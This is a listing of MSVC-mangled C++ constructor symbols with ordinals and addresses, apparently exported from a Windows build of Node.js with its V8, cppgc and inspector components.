                                                                                                                                                                                                        ??0?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@XZ2690x140079750
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@@Z2700x1404b9e80
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2710x1404b9eb0
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@@Z2720x1404b9ee0
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2730x1404b9fa0
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2740x1404ba060
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2750x1404ba080
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ2760x1404ba100
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBQEAVMoveOperands@compiler@internal@v8@@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@45@@Z2770x1404ba110
                                                                                                                                                                                                        ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2780x1404ba180
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@@Z2790x14007b4c0
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2800x14007b480
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@@Z2810x14007c530
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2820x14007c530
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2830x14007b730
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2840x14007c5c0
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ2850x14007b730
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptFrame@v8@@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2860x14007c660
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2870x14007c6e0
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@@Z2880x14007b4c0
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2890x14007b480
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@@Z2900x14007b520
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2910x14007b520
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2920x14007b730
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2930x14007b590
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ2940x14007b730
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptInfo@v8@@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2950x14007b610
                                                                                                                                                                                                        ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2960x14007b680
                                                                                                                                                                                                        ??0AccountingAllocator@internal@v8@@QEAA@XZ2970x1406abec0
                                                                                                                                                                                                        ??0ActivityControl@v8@@QEAA@AEBV01@@Z2980x140079fd0
                                                                                                                                                                                                        ??0ActivityControl@v8@@QEAA@XZ2990x140079fd0
                                                                                                                                                                                                        ??0AddTypeAssertionsReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z3000x140f6cc70
                                                                                                                                                                                                        ??0AddressToTraceMap@internal@v8@@QEAA@$$QEAV012@@Z3010x140751b70
                                                                                                                                                                                                        ??0AddressToTraceMap@internal@v8@@QEAA@AEBV012@@Z3020x140751bd0
                                                                                                                                                                                                        ??0AddressToTraceMap@internal@v8@@QEAA@XZ3030x140751c30
                                                                                                                                                                                                        ??0AlignedSlotAllocator@internal@v8@@QEAA@XZ3040x1404ba1f0
                                                                                                                                                                                                        ??0AllocationProfile@v8@@QEAA@AEBV01@@Z3050x14007a080
                                                                                                                                                                                                        ??0AllocationProfile@v8@@QEAA@XZ3060x14007a080
                                                                                                                                                                                                        ??0Allocator@ArrayBuffer@v8@@QEAA@AEBV012@@Z3070x1400796d0
                                                                                                                                                                                                        ??0Allocator@ArrayBuffer@v8@@QEAA@XZ3080x1400796d0
                                                                                                                                                                                                        ??0AllowCompilation@internal@v8@@QEAA@PEAVIsolate@12@@Z3090x140a7d760
                                                                                                                                                                                                        ??0AllowDeoptimization@internal@v8@@QEAA@PEAVIsolate@12@@Z3100x140a7d780
                                                                                                                                                                                                        ??0AllowExceptions@internal@v8@@QEAA@PEAVIsolate@12@@Z3110x140a7d7a0
                                                                                                                                                                                                        ??0AllowJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z3120x140a7d7c0
                                                                                                                                                                                                        ??0AllowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@@Z3130x140b06380
                                                                                                                                                                                                        ??0ArrayBufferAllocator@node@@QEAA@$$QEAV01@@Z3140x14007a110
                                                                                                                                                                                                        ??0ArrayBufferAllocator@node@@QEAA@AEBV01@@Z3150x14007a110
                                                                                                                                                                                                        ??0ArrayBufferAllocator@node@@QEAA@XZ3160x14007a110
                                                                                                                                                                                                        ??0AsmCallableType@wasm@internal@v8@@IEAA@XZ3170x140631fc0
                                                                                                                                                                                                        ??0AsmFunctionType@wasm@internal@v8@@IEAA@PEAVZone@23@PEAVAsmType@123@@Z3180x140631fd0
                                                                                                                                                                                                        ??0AsmJsOffsetInformation@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@base@3@@Z3190x140538110
                                                                                                                                                                                                        ??0AsmJsScanner@internal@v8@@QEAA@$$QEAV012@@Z3200x140634670
                                                                                                                                                                                                        ??0AsmJsScanner@internal@v8@@QEAA@AEBV012@@Z3210x140634760
                                                                                                                                                                                                        ??0AsmJsScanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@@Z3220x140634830
                                                                                                                                                                                                        ??0AsmOverloadedFunctionType@wasm@internal@v8@@AEAA@PEAVZone@23@@Z3230x140632000
                                                                                                                                                                                                        ??0Assembler@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z3240x14050bda0
                                                                                                                                                                                                        ??0AssemblerBase@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z3250x140ab3a00
                                                                                                                                                                                                        ??0AssemblerOptions@internal@v8@@QEAA@XZ3260x14049b010
                                                                                                                                                                                                        ??0AsyncResource@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@PEBDN@Z3270x1402907b0
                                                                                                                                                                                                        ??0AsyncStreamingDecoder@wasm@internal@v8@@QEAA@V?$unique_ptr@VStreamingProcessor@wasm@internal@v8@@U?$default_delete@VStreamingProcessor@wasm@internal@v8@@@std@@@std@@@Z3280x140571310
                                                                                                                                                                                                        ??0BackgroundCompileTask@internal@v8@@QEAA@PEAUScriptStreamingData@12@PEAVIsolate@12@W4ScriptType@2@@Z3290x140aa5bb0
                                                                                                                                                                                                        ??0BackgroundCompileTask@internal@v8@@QEAA@PEBVParseInfo@12@PEBVAstRawString@12@PEBVFunctionLiteral@12@PEAVWorkerThreadRuntimeCallStats@12@PEAVTimedHistogram@12@H@Z3300x140aa5d60
                                                                                                                                                                                                        ??0BackingStore@internal@v8@@AEAA@PEAX_K11W4SharedFlag@12@W4ResizableFlag@12@_N4444@Z3310x14047bcd0
                                                                                                                                                                                                        ??0BackupIncumbentScope@Context@v8@@QEAA@V?$Local@VContext@v8@@@2@@Z3320x140b063d0
                                                                                                                                                                                                        ??0BasePage@internal@cppgc@@IEAA@AEAVHeapBase@12@AEAVBaseSpace@12@W4PageType@012@@Z3330x140464680
                                                                                                                                                                                                        ??0BaseSpace@internal@cppgc@@IEAA@PEAVRawHeap@12@_KW4PageType@012@_N@Z3340x140464460
                                                                                                                                                                                                        ??0BaseSpace@internal@v8@@IEAA@PEAVHeap@12@W4AllocationSpace@12@@Z3350x14047bd50
                                                                                                                                                                                                        ??0BasicBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VId@0123@@Z3360x140ee11a0
                                                                                                                                                                                                        ??0BasicBlockProfilerData@internal@v8@@QEAA@V?$Handle@VOnHeapBasicBlockProfilerData@internal@v8@@@12@PEAVIsolate@12@@Z3370x140a459f0
                                                                                                                                                                                                        ??0BasicBlockProfilerData@internal@v8@@QEAA@VOnHeapBasicBlockProfilerData@12@@Z3380x140a45a60
                                                                                                                                                                                                        ??0BigIntToI32PairDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z3390x1404b9be0
                                                                                                                                                                                                        ??0BigIntToI32PairDescriptor@internal@v8@@QEAA@XZ3400x1404ba210
                                                                                                                                                                                                        ??0BigIntToI64Descriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z3410x1404b9be0
                                                                                                                                                                                                        ??0BigIntToI64Descriptor@internal@v8@@QEAA@XZ3420x1404ba220
                                                                                                                                                                                                        ??0Bignum@base@v8@@QEAA@XZ3430x140e6f6c0
                                                                                                                                                                                                        ??0Binary@protocol@v8_inspector@@AEAA@V?$shared_ptr@V?$vector@EV?$allocator@E@std@@@std@@@std@@@Z3440x14042dcf0
                                                                                                                                                                                                        ??0Binary@protocol@v8_inspector@@QEAA@$$QEAV012@@Z3450x14042dd80
                                                                                                                                                                                                        ??0Binary@protocol@v8_inspector@@QEAA@AEBV012@@Z3460x14042ddb0
                                                                                                                                                                                                        ??0Binary@protocol@v8_inspector@@QEAA@XZ3470x140079750
                                                                                                                                                                                                        ??0BitVector@internal@v8@@QEAA@AEBV012@PEAVZone@12@@Z3480x1404ba230
                                                                                                                                                                                                        ??0BitVector@internal@v8@@QEAA@HPEAVZone@12@@Z3490x1404ba2d0
                                                                                                                                                                                                        ??0BitVector@internal@v8@@QEAA@XZ3500x1404ba3a0
                                                                                                                                                                                                        ??0BlockBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVBreakableStatement@23@@Z3510x1408f2780
                                                                                                                                                                                                        ??0BlockData@Coverage@debug@v8@@AEAA@PEAUCoverageBlock@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z3520x14047bd70
                                                                                                                                                                                                        ??0BlockData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z3530x14047bda0
                                                                                                                                                                                                        ??0BookmarkScope@Scanner@internal@v8@@QEAA@PEAV123@@Z3540x14047bdd0
                                                                                                                                                                                                        ??0BoundedPageAllocator@base@v8@@QEAA@PEAVPageAllocator@2@_K11@Z3550x140e68850
                                                                                                                                                                                                        ??0BranchElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z3560x140f096f0
                                                                                                                                                                                                        ??0BranchElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@W4Phase@0123@@Z3570x140f8e490
                                                                                                                                                                                                        ??0BranchHintMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z3580x14047bdf0
                                                                                                                                                                                                        ??0BranchHintMap@wasm@internal@v8@@QEAA@AEBV0123@@Z3590x14047bed0
                                                                                                                                                                                                        ??0BranchHintMap@wasm@internal@v8@@QEAA@XZ3600x14045ac30
                                                                                                                                                                                                        ??0BranchMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z3610x141099100
                                                                                                                                                                                                        ??0BreakIterator@internal@v8@@QEAA@V?$Handle@VDebugInfo@internal@v8@@@12@@Z3620x140a5c690
                                                                                                                                                                                                        ??0BreakLocation@debug@v8@@QEAA@HHW4BreakLocationType@12@@Z3630x14047bf60
                                                                                                                                                                                                        ??0BreakableControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z3640x1408f27b0
                                                                                                                                                                                                        ??0ByteData@PreparseDataBuilder@internal@v8@@QEAA@XZ3650x14047bf90
                                                                                                                                                                                                        ??0BytecodeAnalysis@compiler@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@VBytecodeOffset@23@_N@Z3660x141096f70
                                                                                                                                                                                                        ??0BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@HHPEAVFeedbackVectorSpec@23@W4RecordingMode@SourcePositionTableBuilder@23@@Z3670x140918f40
                                                                                                                                                                                                        ??0BytecodeArrayIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@H@Z3680x1409135f0
                                                                                                                                                                                                        ??0BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@@Z3690x140913030
                                                                                                                                                                                                        ??0BytecodeArrayWriter@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVConstantArrayBuilder@123@W4RecordingMode@SourcePositionTableBuilder@23@@Z3700x140912210
                                                                                                                                                                                                        ??0BytecodeIterator@wasm@internal@v8@@QEAA@$$QEAV0123@@Z3710x1405235c0
                                                                                                                                                                                                        ??0BytecodeIterator@wasm@internal@v8@@QEAA@AEBV0123@@Z3720x1405235c0
                                                                                                                                                                                                        ??0BytecodeIterator@wasm@internal@v8@@QEAA@PEBE0PEAUBodyLocalDecls@123@@Z3730x1405c2700
                                                                                                                                                                                                        ??0BytecodeJumpTable@interpreter@internal@v8@@QEAA@_KHHPEAVZone@23@@Z3740x1408f2840
                                                                                                                                                                                                        ??0BytecodeLabel@interpreter@internal@v8@@QEAA@XZ3750x1408f0560
                                                                                                                                                                                                        ??0BytecodeLabels@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z3760x1408f0570
                                                                                                                                                                                                        ??0BytecodeLivenessMap@compiler@internal@v8@@QEAA@$$QEAV0123@@Z3770x140f91980
                                                                                                                                                                                                        ??0BytecodeLivenessMap@compiler@internal@v8@@QEAA@HPEAVZone@23@@Z3780x141096b90
                                                                                                                                                                                                        ??0BytecodeLoopAssignments@compiler@internal@v8@@QEAA@HHPEAVZone@23@@Z3790x1410971f0
                                                                                                                                                                                                        ??0BytecodeLoopHeader@interpreter@internal@v8@@QEAA@XZ3800x1408f05d0
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@AEAA@W4Bytecode@123@HW4OperandScale@123@VBytecodeSourceInfo@123@IIIII@Z3810x1408f8ee0
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIIVBytecodeSourceInfo@123@@Z3820x1408f8f20
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIIVBytecodeSourceInfo@123@@Z3830x1408f91e0
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIIVBytecodeSourceInfo@123@@Z3840x1408f9420
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IIVBytecodeSourceInfo@123@@Z3850x1408f95e0
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@IVBytecodeSourceInfo@123@@Z3860x1408f9720
                                                                                                                                                                                                        ??0BytecodeNode@interpreter@internal@v8@@QEAA@W4Bytecode@123@VBytecodeSourceInfo@123@@Z3870x1408f9800
                                                                                                                                                                                                        ??0BytecodeOffsetIterator@baseline@internal@v8@@QEAA@V?$Handle@VByteArray@internal@v8@@@23@V?$Handle@VBytecodeArray@internal@v8@@@23@@Z3880x140ae5880
                                                                                                                                                                                                        ??0BytecodeOffsetIterator@baseline@internal@v8@@QEAA@VByteArray@23@VBytecodeArray@23@@Z3890x140ae5920
                                                                                                                                                                                                        ??0BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVBytecodeRegisterAllocator@123@HHPEAVBytecodeWriter@0123@@Z3900x1408f7a90
                                                                                                                                                                                                        ??0CFunction@v8@@QEAA@PEBXPEBVCFunctionInfo@1@@Z3910x140b06420
                                                                                                                                                                                                        ??0CFunction@v8@@QEAA@XZ3920x140079750
                                                                                                                                                                                                        ??0CFunctionInfo@v8@@QEAA@AEBVCTypeInfo@1@IPEBV21@@Z3930x140b06470
                                                                                                                                                                                                        ??0CPU@base@v8@@QEAA@XZ3940x140e63810
                                                                                                                                                                                                        ??0CachedData@ScriptCompiler@v8@@QEAA@PEBEHW4BufferPolicy@012@@Z3950x140b06490
                                                                                                                                                                                                        ??0CachedData@ScriptCompiler@v8@@QEAA@XZ3960x140078b20
                                                                                                                                                                                                        ??0CallDescriptor@compiler@internal@v8@@QEAA@W4Kind@0123@VMachineType@23@VLinkageLocation@123@PEAV?$Signature@VLinkageLocation@compiler@internal@v8@@@23@_KV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@IIV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@93@PEBDW4StackArgumentOrder@23@I4@Z3970x1404ba3c0
                                                                                                                                                                                                        ??0CallInterfaceDescriptor@internal@v8@@QEAA@W4Key@CallDescriptors@12@@Z3980x1404b9be0
                                                                                                                                                                                                        ??0CallInterfaceDescriptor@internal@v8@@QEAA@XZ3990x1400fba60
                                                                                                                                                                                                        ??0CallInterfaceDescriptorData@internal@v8@@QEAA@XZ4000x1404ba420
                                                                                                                                                                                                        ??0CallRuntimeParameters@compiler@internal@v8@@QEAA@W4FunctionId@Runtime@23@_K@Z4010x140078f70
                                                                                                                                                                                                        ??0CallbackScope@AsyncResource@node@@QEAA@PEAV12@@Z4020x1402908e0
                                                                                                                                                                                                        ??0CallbackScope@node@@QEAA@PEAVEnvironment@1@V?$Local@VObject@v8@@@v8@@Uasync_context@1@@Z4030x14028f380
                                                                                                                                                                                                        ??0CallbackScope@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@Uasync_context@1@@Z4040x14028f400
                                                                                                                                                                                                        ??0Cancelable@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z4050x14047bfa0
                                                                                                                                                                                                        ??0CancelableTask@internal@v8@@QEAA@PEAVCancelableTaskManager@12@@Z4060x1406b7e40
                                                                                                                                                                                                        ??0CancelableTask@internal@v8@@QEAA@PEAVIsolate@12@@Z4070x1406b7e90
                                                                                                                                                                                                        ??0CancelableTaskManager@internal@v8@@QEAA@XZ4080x1406b7ee0
                                                                                                                                                                                                        ??0CanonicalHandleScope@internal@v8@@QEAA@PEAVIsolate@12@PEAVOptimizedCompilationInfo@12@@Z4090x1409f4470
                                                                                                                                                                                                        ??0Channel@V8Inspector@v8_inspector@@QEAA@AEBV012@@Z4100x140079ab0
                                                                                                                                                                                                        ??0Channel@V8Inspector@v8_inspector@@QEAA@XZ4110x140079ab0
                                                                                                                                                                                                        ??0CheckpointElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z4120x140f09840
                                                                                                                                                                                                        ??0CheckpointElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@@Z4130x140f9e570
                                                                                                                                                                                                        ??0ClassScope@internal@v8@@QEAA@$$QEAV012@@Z4140x1406ea500
                                                                                                                                                                                                        ??0ClassScope@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z4150x140af1750
                                                                                                                                                                                                        ??0ClassScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@_N@Z4160x140af19d0
                                                                                                                                                                                                        ??0CodeAssembler@compiler@internal@v8@@QEAA@PEAVCodeAssemblerState@123@@Z4170x140078b40
                                                                                                                                                                                                        ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@AEBV?$ZoneVector@PEAVCodeAssemblerVariable@compiler@internal@v8@@@23@W4Type@0123@@Z4180x140ab1f10
                                                                                                                                                                                                        ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerVariable@123@W4Type@0123@@Z4190x140ab1f40
                                                                                                                                                                                                        ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@V?$initializer_list@PEAVCodeAssemblerVariable@compiler@internal@v8@@@std@@W4Type@0123@@Z4200x140ab1f70
                                                                                                                                                                                                        ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@W4Type@0123@@Z4210x140ab1fa0
                                                                                                                                                                                                        ??0CodeAssemblerLabel@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@_KPEBQEAVCodeAssemblerVariable@123@W4Type@0123@@Z4220x140f1c6d0
                                                                                                                                                                                                        ??0CodeAssemblerState@compiler@internal@v8@@AEAA@PEAVIsolate@23@PEAVZone@23@PEAVCallDescriptor@123@W4CodeKind@23@PEBDW4PoisoningMitigationLevel@23@W4Builtin@23@@Z4230x140f1c8d0
                                                                                                                                                                                                        ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@AEBVCallInterfaceDescriptor@23@W4CodeKind@23@PEBDW4PoisoningMitigationLevel@23@W4Builtin@23@@Z4240x140f1cb40
                                                                                                                                                                                                        ??0CodeAssemblerState@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@HW4CodeKind@23@PEBDW4PoisoningMitigationLevel@23@W4Builtin@23@@Z4250x140f1cbd0
                                                                                                                                                                                                        ??0CodeAssemblerVariable@compiler@internal@v8@@IEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@@Z4260x140f1cc50
                                                                                                                                                                                                        ??0CodeAssemblerVariable@compiler@internal@v8@@IEAA@PEAVCodeAssembler@123@W4MachineRepresentation@23@PEAVNode@123@@Z4270x140f1cdd0
                                                                                                                                                                                                        ??0CodeBuilder@Factory@internal@v8@@QEAA@PEAVIsolate@23@AEBVCodeDesc@23@W4CodeKind@23@@Z4280x1409ce0c0
                                                                                                                                                                                                        ??0CodeCommentsIterator@internal@v8@@QEAA@_KI@Z4290x140ab3570
                                                                                                                                                                                                        ??0CodeEntryStorage@internal@v8@@QEAA@XZ4300x1407448d0
                                                                                                                                                                                                        ??0CodeEventHandler@v8@@QEAA@PEAVIsolate@1@@Z4310x140b064b0
                                                                                                                                                                                                        ??0CodeEventLogger@internal@v8@@QEAA@PEAVIsolate@12@@Z4320x1408d0f00
                                                                                                                                                                                                        ??0CodeGenerator@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVFrame@123@PEAVLinkage@123@PEAVInstructionSequence@123@PEAVOptimizedCompilationInfo@23@PEAVIsolate@23@V?$Optional@VOsrHelper@compiler@internal@v8@@@base@3@HPEAVJumpOptimizationInfo@23@W4PoisoningMitigationLevel@23@AEBUAssemblerOptions@23@W4Builtin@23@_K_KPEBD@Z4330x140ee44c0
                                                                                                                                                                                                        ??0CodeMap@internal@v8@@QEAA@AEAVCodeEntryStorage@12@@Z4340x14074cc40
                                                                                                                                                                                                        ??0CodeObjectRegistry@internal@v8@@QEAA@$$QEAV012@@Z4350x14047bfe0
                                                                                                                                                                                                        ??0CodeObjectRegistry@internal@v8@@QEAA@AEBV012@@Z4360x14047c010
                                                                                                                                                                                                        ??0CodeObjectRegistry@internal@v8@@QEAA@XZ4370x14047c040
                                                                                                                                                                                                        ??0CodeSpaceWriteScope@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z4380x1405d7680
                                                                                                                                                                                                        ??0CombinedHeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@HeapObjectIterator@12@@Z4390x1409f1090
                                                                                                                                                                                                        ??0CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAA@AEBV012@@Z4400x14042dde0
                                                                                                                                                                                                        ??0CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAA@XZ4410x14042dde0
                                                                                                                                                                                                        ??0CommonEnvironmentSetup@node@@AEAA@PEAVMultiIsolatePlatform@1@PEAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@V?$function@$$A6APEAVEnvironment@node@@PEBVCommonEnvironmentSetup@2@@Z@4@@Z4420x14028e9f0
                                                                                                                                                                                                        ??0CommonOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z4430x140eaeba0
                                                                                                                                                                                                        ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z4440x140f09860
                                                                                                                                                                                                        ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVJSHeapBroker@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVZone@23@@Z4450x140f9e970
                                                                                                                                                                                                        ??0CompactionSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@W4CompactionSpaceKind@12@@Z4460x14047c060
                                                                                                                                                                                                        ??0Compactor@internal@cppgc@@QEAA@AEAVRawHeap@12@@Z4470x140468c80
                                                                                                                                                                                                        ??0CompilationCache@internal@v8@@AEAA@PEAVIsolate@12@@Z4480x140ab06c0
                                                                                                                                                                                                        ??0CompilationDependencies@compiler@internal@v8@@QEAA@$$QEAV0123@@Z4490x140e800f0
                                                                                                                                                                                                        ??0CompilationDependencies@compiler@internal@v8@@QEAA@AEBV0123@@Z4500x140e80120
